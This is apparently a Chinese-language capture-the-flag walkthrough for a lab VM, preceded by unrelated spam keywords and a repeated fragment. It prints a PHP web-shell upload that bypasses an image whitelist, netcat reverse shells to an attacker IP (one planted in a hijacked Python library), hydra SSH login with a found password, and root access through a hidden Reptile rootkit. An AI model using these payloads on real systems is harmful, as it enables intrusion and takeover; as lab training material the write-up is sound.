asp做企业网站很好啊,网站首页代码怎么写,网站与新闻建设总结,软件开发服务器做virtualBox的端口映射吧
suukmedim文件白名单绕过、反弹shell、$paht环境变量更改、python 库劫持提权、Reptile提权、sandfly-processdecloak使用
服务扫描
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV -A -T 4 -p 22,80 192.168.18.238GetSHell
访问80http://192.168.…做virtualBox的端口映射吧
suukmedim文件白名单绕过、反弹shell、$paht环境变量更改、python 库劫持提权、Reptile提权、sandfly-processdecloak使用
服务扫描
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV -A -T 4 -p 22,80 192.168.18.238
GetSHell
访问80http://192.168.18.238/ 文件上传白名单限制,只允许图片格式,使用1.php.jpg的方式绕过文件上传原因可能是因为后端只取点后的第一个后缀进行解析。
POST /upload.php HTTP/1.1Host: 192.168.18.238User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0Accept: text/html,application/xhtmlxml,application/xml;q0.9,image/avif,image/webp,*/*;q0.8Accept-Language: en-US,en;q0.5Accept-Encoding: gzip, deflate, brContent-Type: multipart/form-data; boundary---------------------------58834982911681499741555270890Content-Length: 365Origin: http://192.168.18.238Connection: closeReferer: http://192.168.18.238/Upgrade-Insecure-Requests: 1-----------------------------58834982911681499741555270890Content-Disposition: form-data; namephoto; filename1.php.jpgContent-Type: image/png?php system($_GET[cmd]);?-----------------------------58834982911681499741555270890Content-Disposition: form-data; namesubmitUpload-----------------------------58834982911681499741555270890--访问http://192.168.18.238/upload/1.php.jpg?cmdid
反弹shell
http://192.168.18.238/upload/1.php.jpg?cmdnc%20-e%20/bin/bash%20192.168.44.128%209001┌──(kali㉿kali)-[~]
└─$ nc -lnvp 9001
listening on [any] 9001 ...
connect to [192.168.44.128] from (UNKNOWN) [192.168.44.10] 4854
id
uid33(www-data) gid33(www-data) groups33(www-data)
script /dev/null -c bash
Script started, file is /dev/null
www-datakuus:/var/www/html/upload$
提权
tignasse 账号下有个.pass.txt 文件但是经过测试并没有用 尝试常规的sudo\suid\内核\任务计划\进程分析手段、爆破了一段时间之后,也没结果。实在不想浪费时间了看了别人的writeup才知道。这里密码另有隐情
www-datakuus:/home$ ls
ls
mister_b tignassewww-datakuus:/home/tignasse$ more .pass.txt
more .pass.txt
716n4553
www-datakuus:/home/tignasse$ cat .pass.txt
cat .pass.txt
Try harder !
hydra
hydra -l tignasse -p 716n4553 ssh://192.168.18.238[22][ssh] host: 192.168.18.238 login: tignasse password: 716n4553ssh
┌──(kali㉿kali)-[~]
└─$ sudo ssh tignasse192.168.18.238tignassekuus:~$ sudo -l(mister_b) NOPASSWD: /usr/bin/python /opt/games/game.py
tignasse 用户下可以看到mister_b 用户有个特权脚本 game.py文件由用户mister_b所有它导入3 个库。可以看到导入的库使用了可能被滥用的相对路径。 1、我们在/opt/games内创建一个名为random.py的文件其中包含以下内容
import os
os.system(nc -e /bin/bash 192.168.44.128 9000)2.、将/opt/games添加到PATH 通过 python 库劫持进行的权限升级因为 python 会搜索它导入的库这些库通常是 PATH 中第一个的库这就是我们在PATH之前添加/opt/games的原因。 3、最后我们使用nc 监听 2334端口然后使用sudo 执行该脚本后成功获取mister_b权限
┌──(kali㉿kali)-[~]
└─$ nc -lnvp 9000
listening on [any] 9000 ...
connect to [192.168.44.128] from (UNKNOWN) [192.168.44.10] 4315
id
uid1001(mister_b) gid1001(mister_b) groups1001(mister_b)
script /dev/null -c bash
Script started, file is /dev/nullmister_bkuus:~$ cat user.txt
cat user.txt
Ciphura
历史记录发现执行了一个二进制文件
mister_bkuus:~$ cat .bash_history
cat .bash_history
ps -aux |grep root
ss -altp
sudo -l
find / -writable ! -user whoami -type f ! -path /proc/* ! -path /sys/* -exec ls -al {} \; 2/dev/null
./sandfly-processdecloak
exit
sandfly-processdecloak是一个实用程序用于快速扫描被常见和不常见的可加载内核模块隐形 Rootkit 隐藏的 Linux 进程 ID (PID)并将其隐藏起来使它们可见。比如Diamorphine, Reptile and variants
编译了一个上传上去执行并没有看到隐藏进程后面找了一下reptile项目发现reptile 文件夹也是隐藏的。
https://github.com/f0rb1dd3n/Reptile/wiki/Local-Usage
在www-data 的 bash 历史记录中有一个名为reptile的隐藏目录
www-datakuus:/var/www$ cd ~
www-datakuus:/var/www$ cat .bash_history尝试执行如下命令发现直接提取到rootwww-data 权限也是可以直接提取到root
/reptile/reptile_cmd rootrootkuus:/home/mister_b# cat user.txt
cat user.txt
Ciphura
rootkuus:/home/mister_b# cat /root/root.txt
cat /root/root.txt
Warulli
